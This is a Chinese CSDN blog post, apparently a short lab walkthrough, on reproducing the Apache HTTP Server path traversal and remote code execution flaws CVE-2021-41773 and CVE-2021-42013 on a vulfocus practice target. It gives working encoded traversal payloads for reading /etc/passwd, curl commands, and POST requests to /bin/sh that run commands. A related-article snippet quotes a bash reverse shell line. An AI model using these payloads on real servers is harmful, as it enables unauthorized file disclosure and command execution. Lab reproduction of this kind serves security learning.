vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013

西蒙娜

已于 2024-04-19 12:19:46 修改

阅读量603

点赞数 3

分类专栏：漏洞复现文章标签： apache

于 2024-04-19 11:57:29 首次发布

本文链接：https://blog.csdn.net/qq_27249127/article/details/137957208

版权

漏洞复现专栏收录该内容

11 篇文章 1 订阅

订阅专栏

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。

payload:

1:get：在url后面加上

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

2:Linux ：

curl -v --path-as-is 'http://123.58.224.8:57446/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

目录遍历：GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

远程代码执行：cve-2021-42013

bp抓包

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

或： POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;id

echo ; ls/tmp

linux:

curl --data "echo;ls /tmp" 'http://目标IP：端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

西蒙娜

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

vulfocus复现：struts2-cve_2017_5638

m0_71518346的博客

12-17

450

Apache Struts是美国阿帕奇（Apache）软件基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段，通过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常，进而导致任意代码执行。

CVE-2021-42013：Apache HTTP Server目录遍历漏洞

weixin_47179815的博客

07-13

2880

该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善，攻击者可利用该漏洞绕过修复补丁，并利用目录穿越攻击访问服务器中一些文件，进而造成敏感信息泄露。若httpd中开启CGI功能，攻击者可以构造恶意请求，造成远程代码执行。Apache HTTP Server 2.4.50 Apache HTTP Server 2.4.49查询地址：http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202

参与评论您还未登录，请先登录后发表或查看评论

vulfocus——apache(cve_2021_41773)

m0_62063669的博客

09-22

1060

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件，如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护（默认禁用），则这些恶意请求就会成功。除此之外，该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞，攻击者可利用该漏洞读取到Web目录外的其他文件，如系统配置文件、网站源码等，甚至在特定情况下，攻击者可构造恶意请求执行命令，控制服务器。

【路径穿越】vulfocus/apache-cve_2021_41773

wj33333的博客

11-16

311

利用网上爆出得poc代码尝试获取/etc/passwd中得内容，poc如下,可轻松得到敏感内容。查看/tmp/flag。

【漏洞复现-Apache-目录穿越文件读取-RCE】vulfocus/apache(cve_2021_41773)

10-07

2224

【Apache-目录穿越文件读取-RCE】

vulfocus apache-cve_2021_41773 漏洞复现

最新发布

XXokok的博客

11-26

584

vulfocus apache-cve_2021_41773 漏洞复现

apache-CVE-2021-41773[42013]-本地验证

csd_ct的专栏

02-06

3204

cve-2021-41773本地验证上次在验证41773时，使用bash命令反弹shell不成功，vulfocus上提供的时在线靶场环境有时间限制，且无法看到后台日志，不知道时哪里出错了，于是决定从0到1开始，在本地搭建一个实验环境，看看是哪里出现了问题搭建本地验证环境 docker 中直接拉取apache 2.4.49的镜像 docker pull httpd:2.4.49 docker images 查看镜像，如图启动该镜像，运行apache, docker run -d -p 80:80

CVE-2021-41773、CVE-2021-42013检测脚本

dreamthe的博客

12-04

1404

自己在家写的简单的脚本检测，没有多么炫酷，代码的备注都给你们写的好好的，给小女点个赞再走咯。为啥使用urllib不要request模块是因为在写的时候发现request模块会将url进行转码。所以使用比较老的urllib模块。 #!/usr/bin/env python3 # -*- coding: utf-8 -*- # author： trance # datetime： 2021/12/2 0002 22:29 # !/usr/bin/env python3 # -*- coding: utf-8

log4j2漏洞原理分析及复现-CVE-2021-44228 （vulfocus靶场）

yang1234567898的博客

04-18

3227

搭建靶场： docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像搭建成功！利用漏洞已经漏洞存在的情况下，构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...

struts059-cve_2019_0230漏洞复现

0day

01-27

1716

struts059-cve_2019_0230漏洞复现漏洞概述：该漏洞编号为CVE-2019-0230，漏洞等级：高危。攻击者可以通过构造恶意的OGNL表达式，并将其设置到可被外部输入进行修改，且会执行OGNL表达式的Struts2标签的属性值，引发OGNL表达式解析，最终造成远程代码执行的影响。复现漏洞：启动虚拟机，在docker中运行vulfocus镜像，通过浏览器访问，并下载struts059-cve_2019_0230镜像启动漏洞环境，开始漏洞复现打开漏洞..

CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现

weixin_45260839的博客

06-03

5719

CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现

apache-cve_2021_41773 复现

YouthBelief的博客

11-05

1740

apache-cve_2021_41773 复现apache-cve_2021_41773 复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现手工复现0x04 漏洞修复 apache-cve_2021_41773 复现 Apache HTTP Server是一个开源、跨平台的Web服务器，它在全球范围内被广泛使用。 0x01 漏洞描述 2021年10月5日，Apache发布更新公告，修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞（CVE-2021-41773）。

【漏洞复现-Apache-文件上传】vulfocus/apache-cve_2017_15715

10-09

2694

【Apache-文件上传】

Apache——CVE-2021-41773

qq_45770644的博客

10-06

3737

前言： Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序，该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用，它表示，并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件，方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。该问题仅影响 Apache 开源 Web 服务器的 2.4.49.

apache-CVE-2021-41773[42013]-漏洞复现

csd_ct的专栏

02-05

3319

apache-CVE-2021-41773[42013] 验证及复现 CVE-2021-41773 影响范围为2.4.49 CVE-2021-42013 影响范围为2.4.49/50 漏洞验证 41773和42013在10月份时，被暴出目录穿越和远程命令执行，虽然只影响了apache的49/50版本，但是RCE漏洞，POC已公开，还是有较强的杀伤力。为了快速验证一下该漏洞，使用vulfocus提供的在线的靶场，开启应用，如图访问应用首页，可得到apche服务器版本信息，如图，验证目录遍历利用网上爆

CVE-2021-41773

weixin_44770698的博客

03-28

345

Apache2.4.49 路径穿越以及命令执行！

(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现

daxi0ng的博客

10-11

1843

0x00 简介 Apache HTTP Server（HTTPd）是Apache软件基金会的一个开放源代码的网页服务器。 0x01 漏洞概述 Apache HTTP Server目录遍历漏洞CVE-2021-41773 影响版本：Apache HTTP Server 2.4.49 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞，攻击者利用该漏洞在未授权的情况下，访问服务器未在httpd配置文件中标记为拒绝请求的文...

Apache HTTP Server路径遍历漏洞复现0day（CVE-2021-41773|CVE-2021-42013远程代码执行）

内心不种满鲜花就会长满杂草

10-09

5567

声明：请勿用于非法入侵，仅供检测与学习！传送门 ——>中华人民共和国网络安全法漏洞描述在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护，则这些请求可能会成功。此外，此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询：server=.

Apache HTTP Server漏洞（CVE-2021-41773）

weixin_44769042的博客

10-26

5883

漏洞复现记录--1 搭建环境容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用： dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问：ip:8080